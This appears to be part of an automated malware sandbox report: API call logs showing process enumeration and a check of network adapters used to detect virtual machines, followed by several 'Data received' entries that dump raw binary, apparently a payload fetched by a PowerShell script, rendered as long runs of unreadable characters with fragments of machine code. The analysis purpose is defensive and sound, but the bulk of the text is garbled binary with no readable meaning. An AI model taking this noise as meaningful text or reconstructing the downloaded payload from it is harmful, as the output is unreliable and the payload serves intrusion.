Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: EJNFTE.Exe process_identifier: 2672	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000002c8 process_name: EJNFTE.Exe process_identifier: 2704	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 24, 2021, 10:49 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (6 events)

Data received	tq@D$PWÿpq@jUUÿt$ ÿt$ Uÿ5x6Bÿq@UÿvèÕÿÿ9-l6Bu\jÿ5x6Bÿ`r@hèÃëÿ5x6Bÿèq@ÿ5høA-¨>BWÿlq@9- Bu9-x6Btj Wÿ`r@Ç B3À_^][ÄÂ\|$xuÿl6Bjÿt$hÿ5¨>BÿDr@Âÿt$jèePD$èPÿt$èÎÂÿt$ÿ5Bÿ<r@Âjÿt$j(ÿ5¨>BÿDr@Â¡x6BÀtjjÿt$PÿDr@ÂUììEVÍþÿÿøjëÿuÿq@ðöt}öFW=q@tPÿ×öFt PÿuÿTp@ÿvÿuÿPp@FöFEøtPÿ×EøöF_t Pÿuÿ<p@öFt!FEôFÀtPÿDp@EôPÿHp@FFë3À^ÉÂUìE dôAÿuÈQÿuÿ¼p@ÿuè-MdôA3À]ÂUìì}SVW ]{0ÿ} \|6B½+È9¡Ø>Bÿs4øj"¾ECÿueøðG÷ÖÁîæà}ôÇEü,@@ðèLþÿÿÿs8j#ÿuè?þÿÿ3ÀjöÀ Pÿuÿq@VèCþÿÿhèÿuÿ,r@ØSè@þÿÿ5Dr@jjh[SÿÖ¡°>B@hÀ} ÷ØPÿq@PjhCSÿÖhjhESÿÖ%dôAWè!Pjh5SÿÖEôPÿuhISÿÖ%B3Àéa},r@5Dr@uZEÁèfÀ.3À9B püAyö PPhðh ÿuÿÓPÿÖàáþPÈèMýÿÿèù}NÊhèÿuÿÓ}uruiOWMø+ÊùUôÇEü@.BsLMôQjhKPÿÖ=q@hjÿ×q@PÿÓjjjÿuühä@ÿuÿ\q@hjÿ×PÿÓ}uKuB ujjhÿ5¨>BÿÖujjjÿ5¨>BÿÖ3À@ë}uÿB}Wÿuÿuèüÿÿ_^[ÉÂ=,?B¡`ôAu¡BjjhôPÿDr@ÃUì}Vuu&ÿv0jÿuèìûÿÿF<Áà @BPhèÿuèÀVÿuÿuè.üÿÿ^]ÂUììH¡püASVEàp<@8Áæ Æ@B}WEü»ûu VSè}Vè4}ur}SWÿ,r@VEøèÀtVè2ÀuVèV=x6Bÿuøÿôq@Eÿp4jWè5ûÿÿEÿp0jWè'ûÿÿÿuøèTûÿÿjèÀnjÿuøÿÐ}Ï·E;ÃuMÁéfùAÇE=é¤j3ÀY}¼ÿuüó«E¿ BhpøAE¸}ÀÇEÌF@uÐèEÄE¸PÇEÈAÿTq@ÀtVPÿxr@Vè¾¡°>BÀt(þBu PjèÎW¿@.BWÿðp@ÀtWVè°ÿBVSÿuè#ëÇE}t }ueüeøVSèûVè$ÀuÇEü¿hôAVWè93ÛSèS;ÃEôt53À;Çt-EäPEìPEØPWÿUôÀulÛtf!Wè=ØK;ßfÇ\uÓ3ÛVWèîWèo;Ãt EÜPEôPEèPEðPWÿÀp@Àt:Eð¾¯EèVÿuôPÿ0q@øÇEøë }ØEÜ¬Ç Áè ÇEø3Ûë}¾jè½9]øt;øsÇEü \|6B9Yt+Pjûhÿèà9]øtWjüVèÒëhXôAVÿuèÖ Eü;Ã£D?Bu jèÉÍÿÿEüEàpt]ü3À9]üÀPèÜøÿÿ9]üu 9Buè{üÿÿBÿuÿuÿuèûøÿÿ_^[ÉÂUì}V5Dr@uÿuhûèc ÿujhfÿuÿÖ}u-ÿuÿuÿPq@Àtjè7ÍÿÿÀu@ë3ÀPjheÿuÿÖ3À^]ÂUìì@SVuWjþ_jÜ[sj _jÝ[þsjÞ3ÿ[þ33ÿÿs3ÀÏ@jÓàY÷ùðEàjßPèHPEÀSPè=PÆ%ÿÿÿÏj 3ÒÀÓèY÷ñÏÓîRVhì@¾ BÿuVèVøèøøWÿr@ÄVÿuÿ5x6Bèf_^[ÉÂÌ>B È>B3ÀÒtVöAtt$±ÁJuê^ÂUìì8V5Dr@W}jj h WÿÖ}t<ÿ q@¿ÈÁè¿ÀEôEðPWMðÿpq@EðPjhWÿÖöEøfuÈÿëEüEÌEÈPjhWÇEÈÿÖEì_^ÉÂUììPSV5,r@WhùÿuÿÖhEøÿuÿÖÈ>B5Dr@Eü¡°>B3ÿ}]äEð"Ej£?B¡Ì>B[}èÁàPj@]ôÿq@jn£Bÿ5 >Bÿ¤q@ BÿhTN@jüEìÿuüÿ0r@Wjj!jj£Bÿ4p@hÿÿ£\|BÿuìPÿ(p@ÿ5\|BSh ÿuüÿÖWWhÿuüÿÖø} WjhÿuüÿÖÿuìÿDp@3ÛEð;Çt'û t}ôPWèPWhCÿuøÿÖSPhQÿuøÿÖCû!\|É}]ôÿt0jÿuèuõÿÿÿt4jÿuègõÿÿ3ÿ3Û9=Ì>BÄEäPUìB8EÈj ÐY]°#ÑÇE´ÿÿ¨ÇE¸ MÄ}ÜUÀt8E°ÇE¸MPjhÇEØÿuüÿÖ BÇEè¹¡B¸ë.¨tSjh ÿuüÿÖØëE°PjhÿuüÿÖ B¹UìGÂ;=Ì>BUìKÿÿÿ}èujðÿuüÿq@$ûPjðÿuüÿ0r@}ôujÿuøÿ`r@ÿuøèôÿÿéÿuüèôÿÿ]ä3ÿ}u3É}AÇEMëM}N¸t 9Eç9EMôt yÒö¹>Buv9Et Myþuh3É9EÁQÿuüèüÿÿ;Ç\|SÈiÉT öÁu@öÁ@tñÉyÉëáþëñP è Æÿÿ¡¸>B3É÷ÐAÇEÁè#ÁME9}ôtNEôxnþÿÿuÿp\WhÿuüÿÖEôxjþÿÿu(xu@\iÀD ë@\iÀ\
Data received	#ß}urf}ùHEÁèf=8WWhGÿuøÿÖøÿ#WPhPÿuøÿÖØûÿtEð9<uj [SèYÆÿÿSWh ÿuÿÖÇE}ÇE}uWWhÿuüÿÖ}u2¡\|B;ÇtPÿ,p@¡B;ÇtPÿüp@=\|B=B=?B}GWWè.Åÿÿ9}tjè>Çÿÿ9}t?ÿ5BèÆÿÿØSè´Åÿÿ3À3É;ß~Uð9<tA@;Ã\|òWQhNÿuøÿÖ]ÇE WWè×Äÿÿ¡B9=Ì>BEä¡È>BÇEÈ0ð}ôXEäMô;ÇttEÀöÅÇE¼tCÇE¼ EÌcþöÁ@tjXëÁà@öÁtÀÑÿuÀÁàâÂÑÁùÀâ áÂAEÄQhÿuüÿÖE¼PWh ÿuüÿÖÿEôÃEô;Ì>BgÿÿÿjWÿuüÿ@r@¡\|6B9xtjè²ùÿÿPjûhÿèðøÿÿ} u5ö¹>Bt,3À} 5`r@ÀÁàøWÿuüÿÖWhþÿuÿ,r@PÿÖÿuÿuÿuè2ñÿÿ_^[ÉÂUì}SVu} u}hèòðÿÿ3Àé}¾uÿuÿ¬q@ÀtQjÿuè5ùÿÿØuë]9uu;9Bt3W¾@B¿ BVWBèSVèðjè0ÅÿÿWVè_ë]Sÿuÿuÿuÿ5Bÿ¨q@^[]ÂUìì0¡6BS3ÛV;ÃWEü°¡T?B¾xüAøEøçu ÿuVèLVè:9]Etÿuè*E=ssÿuVèöEøu Vÿ5h6Bÿôq@öEøuDSShuäÿuü5Dr@ÇEÐÿÖ+Ç]ØEÔEÐP¸+ÇSPÿuüÿÖSÿuÔhÿuüÿÖ;ût ExüA_^[ÉÂV5È>BW=Ì>Bjÿ\|r@ X?Bjèkïÿÿÿt+ÆOöFütÿt$ÿ6èwÃÿÿÀuÆÿuàëÿ,?Bhè2ïÿÿÿr@¡,?B_^ÂUìì@SVW=6B3Û}}üMÐÿMÜÿ3À}àÇEÈ]Ì]Ô]Ø««¡°>B=,r@hH\@`ÿuMEÿ×hî£p6Bÿuÿ×hø£h6Bÿuÿ×ÿ5p6B£6BEüèyîÿÿjèËöÿÿ£t6BEèP6BÿuüÿPr@jÿÌq@Mð5Dr@+ÈEÈPShMÐÿuüÿÖ¸@PPh6ÿuüÿÖ9]\|ÿuShÿuüÿÖÿuSh&ÿuüÿÖ9]\|ÿuSh$ÿuüÿÖEÿp0jÿuè«íÿÿö¸>Bt4Sÿ5p6Bÿ`r@ö¸>Bu jÿuüÿ`r@ëp6Bÿ5h6Bè£íÿÿhìÿuÿ×h0uøShWÿÖö¸>BîÿuSh WÿÖÿuSh WÿÖéÑ}u(EøPShìÿuÿ,r@PhÖO@SSÿÌp@Pÿìp@}5`r@uf}u6Sÿ5p6BÿÖjWÿÖWèíÿÿ}uU9l6Bt&jxÇhøAèìÿÿÿuÿuÿuèíÿÿ_^[ÉÂjÿ5¨>BÿÖ9,?Bu¡püASÿp4ècüÿÿjèIìÿÿ}{u¾9}u¹SShWÿDr@;ÃEóÿÈq@jáSðè¬PjSVÿÄq@EøÿuEèPWÿtq@MèEìë ¿ÈÁè¿ÀSÿuSPQhVÿÀq@3öF;ÆE]ÈÇEÔ BÇEØÿE¿-ÿMEÀPÿuWÿuüÿDr@9]tuãSÿ r@ÿ¸q@VjBÿq@PEÿÈp@ðEÀuÔPSWÿuüÿDr@ðfÇ FFC;]\|ßÿuÿÄp@ÿujÿ´q@ÿ°q@3Àé´þÿÿUììEðÇ¨$BDP3Àh¨$BPPPPPPÿuPÿÐp@Àtÿuôÿìp@EðÉÂÿ%Ðq@hÿt$ÿt$ÿ5x6BÿÔq@ÂD$Èáÿÿ=@?BtÁèuG=H?Btñ¡¨>Bhø@£ü@¡ >B£@D$£@Ç@ 6B @ÿØq@ÂUììHVW}WèöEEøtWÿDq@÷ØÀ@(?BéS]ã]ütÀ+öE!¾¨BWVè}Ût hH@VèëWè ?u =¨B\uh@WèiWè]
Data received	ÆäH"ªàø2ò>\óÂÉé^¾R R¿J¥F /ölb'÷\|#U×±µ!\|ôéú!ti¨ìñÃ Or}\?Ý¼¹ml[^¤<Z4{ð4<"PYê l¼³Ñ:Ð×i¬öUið¿²~$ÅÿÈæ89.t;ä1¾o\|c·Ûfõª¡&ú·ï(Tì´¡[Ò¢ÔÈc°}§¦èù¼ó(¢Í}Ê\¦ø®tGçõ²sMP³õÚL}ZæÀ\|üõó÷¡#½ÛÍ´¾©õÛÃgÙ¯cXrßÿÁþíÔQ®Sèe!3dÌ½T)Jºk$RÂcêªõ'ôáÎ¯SØÉYÇ:y1ù¿§XÔ©Y¸íÕnò+1Eé«ÇQbÚ7vÜL´Nú¼é×èÈUô¶ K®/0'ð5ø99¶F?¢]ßÌ÷ÌÎGÀÍù¿7£Ó!Ó+Û²QÉÇ4èühi\FÏÌªôÂMm8·&^ZôcÅ}(hÔ>ÕYö[h_ßÀDõ3®í±Zu®hO7ÀòÚ°ê#ø>ÊVIx¥~¨3ôéÃB¢ð¢ª ÏT\Itë4X¡gì%=¼2b>+ÌÆ×kÅãr5åáúÛ`þS®_zuÐòð[ZÂ&±Í¦îïV'¼¢Õ5¢}Ôù9ûÑ]NKL¢ ¤y¾ÜTð¶$MÇù-c!gù@ÅxÌ]ÝxUÉïöñQ¼Ýûµ%¤8åÂ3íhO"Æ,É&ÓkFväGMoCýº0ù¤iv÷Ë!-I^V)ÉÑÑ_ rásyk\+[X0âåKbsUUþ,Uëî^øYDø4:U>ÝO!¿>/à«b×ÓzVXØí_¬s¸tÁ°uVcoõïryÉÌÆçf¾ö¯`ÛIÙ_\|Öðpcò ¹4Ý°iéEò;üÓÏº>ÐÕ±³{ùÈpdÖð¬Q´3¸:ÛÏ:9 Çá^Ã¹õ÷¤Ö Vàjíì)üX^ôwð7l2¬ÍÀ¦v·AaÁG½íÚ3ûÈ¿ s~Ý/È£¸b5Øº÷¬,Y{A>z,þÀWnòM<è8w!<Þõo¿zÕâÙÓC,½²]!1zãú1ÂòÍ)««£AÉ¾@;"\úRAê$WÅÌ¸v'¯m ö¿wÑ&¡ñ1=<=ç÷yp¼aN§¹g~í0õ,g;LeÒÀ YÐm8üt27¶à^ÅíØñü@+£Oa½\|Õý8µlÛE},·Ä]¨i·uWµ~8B}vââ÷1ýÊÞJ25¸H&²çGVG4ÍípüÕåÂ²bJ°çTEg `sOLln¼=ÈÕÐÊr9¡ÀýÏqËìPÇþÂö²Ë½Ëìk¿ïç+ÄÜÅ$~®=²ÑµWK»±íË¼s.»ôkYÑÈ#¨k¢ÄWÌ§±ð³ÛØÐÜ«=z;«æô±àåózý1ûë¦aRQB yóèW$IúÑoYu§ºäÊ^zÚßÓÌ<GK² ºHnA-;óÇðôº²øJ¹ÇUuÈÒ):çñèç½¼g1@²Ê^¤¡Ï,øÇkß¡6ÅÓ=¨Ð¤Ó¥Êw0(§]¸ÀÓi_¬Z¥§è²òeUÑÖ}zÍxÇÙ\|~6Æ ÏHx`Û'·Þ<RîL=Ôc%aó÷F:øOòÐ¸wØÆG§ý½$¼v-Þ×»õ¸¥ºHÐ~ÈÝ®ÍêontwPµ]bÈØp~±mãX¶Ý/þÏyÉ£íþaoC¿"¶µÝyÕ5?¨¢üÕ®Dê÷;K¢{µ]dO'>ÄzÇÇß¹¶vÚxÂ4Ýð 4¾yÒ¦ q#d+aDû¬·ÏÉzö:ókÊÍKýî{Ìjaïìuf°ë½X)Ö1ßÌóï÷@wlÖzøZ8¤ úÄ§Ë¢Â=Y0Ä3&î±µSü[\ú4§ÿ%?{¹Y.öØçN¹©Õðí{VöÑåSï½´àËþÊ_´ g¡r8Hdù!Ûê$B:êÃRa!x)U?³'B3öCjS Gá±½Hi¾Â¦¯&ièÓðÑ=&®-¹f·Þ34ð¥>ïÝÔÇ\|ÙÑpèÞ¶áÖD´Á\æ8õê ÀcÐØÇ'a0Ù¨ÄÐ¢Gðý¦¥k£Mà ÿáhòd[MÐ#½dÜRËÀ3Lk¥ì²l 'Wà¸hØJC Õ4}eànßÝ¼ãºô ÛÉÙhÖÓ<g\|` RÈü¾L`4Xh\KG3$0-P¡ ¨_c¼{áÖà,-TOaª6ªÍiÂÕÓ·ÕÚÐñ¯y÷µW)ÑhÒùðç'Ê ;qT¹Úæ@K ð-©ô\|HS\|´¥aA(ÅzWiÎHl»$½N2N+\[-lÝçZDXh¯þéÚÜ%L¤ Üîv9Äçø%{¶ºâK~Äß£hs òÊCB¤Pp¿ÎøÀ»Þ´¤cõêÜÎ2)3qú¯ Ç/}Sü²;ÌLDLÝëÿGµÜW«ÈéÅù" Ïáåm´È\|> ué¬6ÊãDÔVÏÆWçPïëØÏwï®±SQ ´ÈÕ¬¶#òQ&ËÅíÞ}Fú»áå¼¶JÔíõ{zQá¤w4d[ªBèAië_ 1üð#¢¯E¥ë$¦7ÄªØÅø.ÜzÒõRQ¿:Óîë6`ä¦Ëó¤?-°ç]íH°þn4[å\|DóºhÞH³ 2ÎÏäF¬öMíèáG¸ykøÔç.Ç#»´k³UyA¤ÿ,=M¼Ö?¾ÎÎi=¬sA³ÜmævhåõåSòö+8!n7JÕý'G.Íí7_Ùför´»úµ^ajhwÛÀjLé!(dát£4}Èáî¶Ù]3(8÷SÆRÀÊlRÍwx9äkbx ý9ã,PåxfG¦Ç!¦mrä _¯bèÑH3$¬ÅH´Ì¡ 7[ýÒëSl¡&ÞháÄw"õ=S#¥ÆÞ¹9â¼(H·Ö<Ç.á©MtbøÉ\¥y~¼bdç¶á¶NÊÊu Cm^¢ê»uZ£52Ø³î7äGïØ%iÆ%¥_+ÙëZºÓüÞODWÊ9â,í6}nweá\®v{{4À¶z ñ0TÝÙ¬©£eè;D2Øe£¶µ&sÁÉ¤p`UnÞa# 1æ!ä««çÊIðÈZzGíc+ô"æ(i½'¾U8õXâGs i wËÍÏïô!Ú>w^óddÌJÜË¬ÙÌÅÌ4Ñâîx=}¤Çð¡A^2{ÜCÞeO +ç@:³JkÛ]GVß?UÐCVÒ`.£\«!T&Öáj+v1Âs¢J ÝLvX»±¸MeF¨\|Å1t±Ó2¨1ÑÏÝØØÍæ¦½ÒeFzUìÅÏ#²xmµ4ðZ.'ÿ·Ývëcs\|ö²¸] Ø±y\|º¢ð«ä:S£>%e2&ÎzJãÿ}qâ~ì}Á\|¼©åÏ<V6Lã@^sõ:¤mAA${ÆËZÒNæ½"?é¦q·®Ç]±MÏ»ÖÚáý\'WC%«þQf_³¥LèY3[ºV2% }·ä'å gÊ<'õq@¥%)P3ºI½.¶íqÿ@JûJv«¡äo)ñI$ÂLÎ¨þ¨Ý%Ë®sè{$MeßÐÕÈ+}Iä:S`QÕzmqLÚÕä²"oÚ½üÁ@Ï zæK"Ë±ÀÚ\ä{M<ÿ& ½8?ß6¨^/P¯]ü{'!p ò~°MõvÌUcÞr$úAzÝµ¸S:@º7ìÍc$IlÞ'3eCebv\uîS#ò5¸õ%Æ±\
Data received	-È¤ÖWl©B6BöÀW)Óø¶ÓÕ$_»9Çgp4ç©ï~FÜ:Dg÷l¾·û4z0ªºâÕ\l;v±C3Sëa1!ø¤~0êúaK Kí¬Ùqq:èâh³nÊnÔH÷J×FëÇÈvÿ¹H´»l¡fTïA9¢×T¿t6ª5\üßìZ·;³¬DD[o;ãVL²ÁÄúè^+uÐ9p&Ïò@Ü4§©¶Qª±àô;ÈÜçºñ 3 )}oe/õõèÙe°}ñõZÜ`²´ É'TðEÕÖfHV`óÃA4ò©G\|q+Î;N@ÉjS»¦úyá´D¶Ä^_¡I,,l1ÞzYÎÒsÛ´²cDùÎv'ÈD¸/J®±Ó0-¯;Vô¼I Ù#¤õ¸#]`R:µ¥ðÆöÃ¼®vÎëó^1óKúK»û®ªñÜRt+×ÅHxó¼³>Æ)úzD®ùú64W/VÉày³M(8ãieã£ÌOç °à8>NïÞ6 ØÑ>cËtç²=ÊÌ¹bÒ,ÊW0ý:bÒ2£¾®xßùÎHé6ê4Ìl~¹óÈIiÿß@-ÅÈý/ú{Â±KUæ#SÑIi¡zwÇõ!£zâU_sè¶S´S\|ýKÌ\y¼õ5J®òOtqÀ ¾è° ÍskïòÊ%Âý¹OÖ¥= ê´îÜÅì ÂJ+Ýè®V>ÂY¦;ÜZÞ£Óñ~4WRÐçlªy@©gC=[[DÕÆçEõ« ý1!c@ìKê¦jÚ¡ÈïuÁTOº1ãL¦ùSfÎ¤YT¥IolÇ³É HANhfÌ0JKvIàë\|hõUóÙ3JåÓ3¦Óí\{Ý¥ !ü7ø@@èÏYÏ!ñ s@©Ó^±9=(2w£ü-T³¨ùX¯¿ÍÓô7ÿþ¸ñÙeÒÎ¬gÊx9¦`áá\|øG2&tI*XH9®^qìôÏe>qâA¡.Í{ø;s<O ýeÚg"ZS±eì¢A¸Ûßå^SF
Data received	¬aàY¦ú]ÒÅm¿`¥ÖÚU;÷þÀê÷ÆÒ1Ë~(wLYkÊ!Â¦¹3ç¹\|Ø]ûgÿmg#±0~iÁÍÓ³õ ÀXá/cTº{èMWÍ« õ§àµ½ß` ®Ñ¯ÆaaX÷?¶Õ'noç««ØÄ2ÜI¾¬[ ÿªG:2±#ióºX)FÔ z6`Jp÷ zwÖ ÙÛs°¦ÙC:ñ¢V"Ö¸Ú!Z×¸$Eßâ±oÆß26ûå¨>Ý^åÝ}ñôDoÿ¬²ªOó-IY ¡®¶ö¼bË#ÿI¤<,¾È;W-V¨Ò^26òt?ÒzÂáî6¦1Å' \[&Üzïçß2¼,¡{©ªA?ÆW¹±QüL»ÛÒ«ûî{»§Y¬ç@²è,dd£ñFµÌR)ð5MðN[µ&½ârújàAËÇiGG= , &U Í+½(,.âÉÊ86eÖ}à'KwwWloZA5>}êD¢i´{whMFÂÄ´ÉÆ°T"ÒP~Ï/´eâe¥¼ª¾]t«³þE4Õl¸ÕSËâ¥£.ñµKE¢.?kÕ[ö(u7gÙ!ö ´iHëßRzËt3èÎnêçQßïÏ3ï7v×?)-â½ëPõÐg\|Âì~¸^À²}~Qxx£Á©\aü¶¶ê8n8TJ"nÖð¬_Ò^ª´Úû£Ê6;Õ¥Ð{%~Æ¸®êønàZ²Ý"?:üýþ¼´¾ðr"'Ó: S.7Îøõ ± ¼JåüÝ:º®< SªÈLÕñËØÙ4Ö Õ#\|6ÊºBùx Â<"ìâÂpvPmwk(é´¢Å0B<£iÅxÝï?¾JRL2gkÅ1&H\g^Íó¹¸Ýa/vª"!rLA<=wòH~ÔÿQwå¤^%Öäª¯¾^MçË×=¹AðÙðúË°äû6Oêç{.Ç-1_¥ê5F~ÓB6êÝµ7 ù2Xv»GÍðÙúå(%è×³ÎªÍij!øÔìD#÷¼Æö,Þ£ª:2Üé X/F-ÃÒµ@-5¤ÖÙ )üÑo¿lô?ÂÞPÊW°ñG0À´¾Û,¾¹-h= >b-t¬\¶òÒ¬o ÁÃg,?kþ±ôáÃS}ýgâiB:xÇÄÑ >¹ÛèªIÏ}ù9«ÔDIÁñÆB@(iwÀIÂ¡¨JltÇÎ+öä63àúg]ê¹/\|>!àoÞç6æÂ·ÏÉüüPV5@É¯ÿ74ÚkÓa-{¬ªdì¸#Ý-Úâããà5 jSuJP+\8x~W¾ïÈù9ìÛo¹¿ØcÅ¤oeS \)HÂôE'ráÕ£sÞzRx[ãòÍ4qÎ¼%sÛme±XÍ%C+ÓÎÛtÊº<¤ÖZ ¶î&R11wÈZhzJÕgªdmlVyçì'0Oêç(²ÙìúPþ©jëª¸§ÄVÊ×±Ho1ÓË59ÑÄ}ÀgæuQ?ìyÍB°Xí)öí÷Æ:¾>YêP¸d,ÆÀÜtÇu¤ Íi²aÜD´t\|zM8~3J#´ÍÄÜß#ÝÖÓg½27çßöUfÑìÍ³¸÷^v½øÕý§KÄ"ÇbÎq¹(2ò¤ût.ÝÌ¬ÓÒtµD÷ü®àöå:ìC£ò»IòÍ ªÞ,zr\¥~R)ÚV-ìÙÓs-.±ßLè»úù !41J+µ}p#ÌHÞdMüØs´5UX;JßÊprhVÛÒi¼`ÕOGÚ£÷·2Ä,÷otå©ÞðMeÕ>iØg¿ÀJ~fKËÊuüu¯Mï"JET´ÐÏYlV0ú/rÜ42ÃO2ü3º°2BÏóÙs åìP]ÑCo(ÝHZ¤ §0mÔøÛjÍ$&#½%OÑ(dóÛ@$TÍXéXwºØ5@ß®9%-Õ¬á¸iÌ7y^pE!/x²+Å,SÅq¤Bm\|üG}g³¿¬&Èé§ßqÖÌ1¼ª×ÔPóß¯\ïHdÖs,G:ëóFµÆR¡MßSQêe_ÝÊgJü_å9ðh°(&6åôjñ¥¿·»ÖsG£î'=/sqëï i}eò^ïeiîñ"mØ3ÐuËÅ4£gÊpø#çûÛÓu;Íc=ß×ú{Äá¬Wî$`¥oDÁìÑµæÙeñ ä_å<)°qî/óÓ»Á© ÙÒã%$B.Ü] »+´iîÌ¤PünWþñÚe×? ë¥5¼±!F&fúAçÒVÚë¾£G94¸ÐÆüÐW´oñf)]èôn£w¡0R>ªUx°PôÆîÔ<¸68s$u {¢ 2»Nµ°J=N'µ}ûá. /ñoþ8 lªðúþ!¡;ÆÏgom?b; A¼DÖ Þ#çTß]\|1½m¾ô¸³«sÕí6Í«_zO«´«8õþ©¨.\"¿òÜí¨½mÒ²NWÃPûªyPí+ý>ÉS¤`4giã¢8à%j-W.²!ÒÍþþÞ§âú[©×â@Àt¸MÓ¡!ÇÌ÷éû U¢×½t½n'VëSrXº¥=XM?i èµ{ý½¿ÑAø5ìgüà ã"êÍc32$à @oOKFú~C°bµÃÊAÞåþÜ;KhÁÍß:&Åx2ûÄáUfÕiÔ¤{~¦npqHPêóÛ¢'îÛ&~Ù)Vh½cT¢#k^\|Èß·±7uH°ÂÎá\|Ïúb¯r©9ÈÊXxÍÝÊsGo·a6kÅÜPg¬UÆ£þYN =xZi?Ù&,Ø>gÍ9´,{î(®êb%¢uqÃ#Úw§%~LônXSêNÎI& üÐ¶×YyºÇGÁF-%ô<ÀjÅ ¥µàã@H¡XÌòí låÞÛ²®9Ù~i$ßeé&»çüD ÉøÿT±æxR@ß'Â©Çv=òàø_HxÑ:ý¿,¥Vmmx÷y×$ÖrÕü°¢Ç¢ùmó]5ä=¤2Éäc. Æ]ºW#?@ßýxc df\|è<2T·wÞ¨ÞU×¨¨ì×ö¤P%à)FybbáàdEtBc[<W4ÑÏ+°V?ðVr8êÐïq³0úÌxEÔcòÎìô]å{ôù)hi _beÊx¼âwÎTF7;Nj%®Ûrx%-ðÆ]4n«ÎCYnïßø¯uôªOy2¬ZÌà¤ÙNáÆYÆ6wôýÙ©$»ÛËø"KlUYVc0ÌöwUC&7°á\|5û3_eó µszét{KÈ_®i6àÈÌøVµGY£ná¼Rò%/<\ &F2nRß°kbm®]H $ÂHE¸dKIj¬ÝeõF}¯æÄi¶ItõáY]aÞ°teA#ÔâºþÆ©Î&É\|È@»S~ÒäO+a_éGa¯÷ìéëÝ_Ô½Ob}ã±AxcIïtÇMÞÎÌi¸Õe«AovQº[Ócb°"lFÛpJY >>YGjÆãçHFÕº×¾Kñ´´SzÇ²VüwÀø°¤ÜÎ,Èºv.8üU·Ó(¹af àÍUp§ei²iY¦XîBÚ®:ÛLôÈYÏb8a7YH;ÕW1 ÌU6w¤ç6,Ãà!öô¾ºcqb8À=ÙÕØ?ÞCËÂ®g´FÈ/tÄn2Yá¿qñhh}Øñ6Ã%Æø&8¡øaöcÉ)ý¿ì,Ê¾±K'y ÷¾Lã{Ä.»J(m8tÔ_ Á©Ño5ÿª5ÏfÄÒQ>t¤¹À {ÒV´yÝÌ2 Ãüyé-»Ø÷ªÌc´_§û©îET.ä:ÏÐÜ#ô~kzZUÚf&÷æNDÙJ¿ÂhÔ~ÞkG,ÍÁ!*!'éþÃC,ÌíB:qËbjüz!RírI66ÐÆg0au¶5£fÍÁ¤M oÔáev«\|Ò[b0DµG}
Data received	wN2Ä.=ìôp¢ØweñÈ$Zr+l+d¨C°aÃ7¢k³ìªÕøsÒaZ¶>,ù\|ýbj´J2Fòy±bãÔtçKä0ÑÐpäÎÜÉ.:.=ÿÊ½j]×²«1»mØò®Ð¨ÃzTÍ$cÝ·Å¼K s©¦b¿îaÈ¨RY"1â èÙÌ±°>Vã£&ª`<=?E7}Ô¬ªúÐ(²(ü6×¸ñ8â:oð¿eÏÁ7ä#èý äÈa/bô½¦×¯PQÆ4é&jyèÆXO¶4Vþýò%'2ø3Pã¨ÚH¡£e+Ã¿8¦øgn{¨î)YïÍû´í½Ô Î¾Ñ°±]ûÄØm\;x_¶ópYûË¤ë)ÅjÆÛai`FÞSÖ¿(0R] Ø@=Ù6Ãmö1 ÀeÔHÅR½ß1éPA7ù§Ç \ôÀï+©°í °óW¶ñFÌA"[´% 2T[>ìÈNr¯itçµxÝã¢í¤°óJ /û"È³éçª1óÃ·$ñê{ÆúE&ç>ñ¢5aK)Ø¦Í±-OëhTøÌè¿ÆiJÉ h\|:4Ò %8ý/NOéZè¬uâêZ¾VÆ=e7´%©Ó5Ë ¬2í0®^ëä÷¯z#0qªú\|Q»»µf¨=ÖfÅ ½úöïèÞóÚ;x:ðc¸¯Æ%4a/ÈÿCÐV,Í³Bú$~ äoYÇû¿É î¶tËÈÈ+¡6.½.hPË¤æCÈ{÷A ÓÔÏáR5G½LQªðÆEvóïú¸«$R#kéMOå´ÖöW÷Cª ·JbÀ] è`ÈÎ¿¥bM)éÔúÕV¼\6Ü@ÛÂòÖÔ-¿ ;v¤´ ¼`úÇ(AräSèg<iRÑ¼< ã»8¿üñ@ÝûH(áÐÂ»Â«bì$T¼¨2¯þ¼Ð÷ (¯^{@¿WW è\[óð÷{9&{ø®3T% ê"¯&«a7a]¡B 5s-»Zá¸\«úÛÂlïkû&ß'Ð2%âi{«äñNÐ®!T0¼=6W¯èé+C ë6ózÖdtð¥eë±L¯uZAÀç;§þ%×À¨£Í ¨ÕPQ¥ÐK² Zgbs÷³4½\|¨O®ê@zU50ó<ÊY`çehlvõÇdõð¥éúËvGÔØÌ8Õµ®ôSí`¸Ú'ê""æoJ4µü²ÒútxÇqÙ)°@Éôíçù]1ÜÈÊñ§ÐÙÜ³êYcçÅ¶ÀU;5ÛÔ½ªe$µ]kîµËÞß'(»5_ôÕv$ð>NThóBlÛL8A~2+u+sÆdHýjKV"ä2¤¥Y RXÓÿ ÄjUrª¿ù`,ÒF ¶5ð&÷ZÄ×lÄ¢îùÔ¸Z%Fz´¯à¨6óÛ~XÑv°°z®6ÊÇ²tÌìµû]éù/³Ht(WÍàééq>ÑJ)y~eJ þë³â¢ÍpÏÆ=ëm. Ýw[\l.§}ÝÈ#MT°¯HØ¬-{®3VUÜÑ§aT¡ÛÙð¾¨¸ÜsY5!êKfcS¼oNKÿfÖ:4n,ÏQÜJõhMTxö7Ì}¢¥\H¸MóZE£}#Íq$üOÍd(û³Ãèºm¯v9ÔtÏ`1sH¨Î+o7Ñö®¥¡d£¦}süÔÇWGñË¥ß{=`Î&ïö õ®~ivXð¢ó 4Üþ²øÇeSOcÜÞ'XN~3Ý³þqAÑãÑ8é y$hFQf$yÍ5LT @Îy!R-¤Â0ä'Ó#fÀ²¢ì¾Oüù¿éÍ8ì?¼õÄWEFjSW8au»ÑýnyJbu¼IË5H![ áök¹·×%ö[5¥1ìl×F<Lü'Sá¿ùeqx2^Èûg«\Ëf×_mc~ô»DC>X1£¯»Ì´Þ«±.,°ÐVc ß¬4²TmíÀÓJ æÎãIÿ+Ù.µìÁÿ8¶PÓ/öq °ÆT¹UÏçX 